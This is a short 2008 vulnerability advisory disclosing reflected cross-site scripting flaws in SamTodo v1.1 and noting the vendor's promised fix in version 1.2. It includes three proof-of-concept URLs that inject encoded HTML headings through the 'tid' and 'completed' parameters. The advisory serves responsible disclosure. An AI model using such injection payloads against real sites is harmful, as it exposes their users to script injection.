Original advisory: http://www.davidsopas.com/soapbox/samtodo.txt
XSS
in SamTodo v1.1
http://samjlevy.com/samtodo
by David Sopas Ferreira
<smok3f00 at gmail.com>
<www.davidsopas.com>
Found and reported at : 22-05-2008PT
Full disclosure at : 05-06-2008PT
?!---------------------------------------------------------
Flaws
-----!?
XSS attacks on this script (vulnerable files - dsp_main.php and
dsp_task_editor.php):
<PoC>
index.php?go=main.taskeditor&tid=f29de7fa-6625-4e20-8a19-11c0f4d799f6%22%3E%3Ch1%3Eboo%3C/h1%3E&mode=edit
</PoC>
<PoC>
index.php?go=main.default&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E
</PoC>
<PoC>
index.php?go=main.default&orderBy=taskComplete&ascDesc=DESC&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E
</PoC>
?!---------------------------------------------------------
Solution
--------!?
Vendor, Samuel Levy, was very fast with reply, and showed a lot of
concern on security matters on his script. Version 1.2 will be out soon and will
fix all this flaws.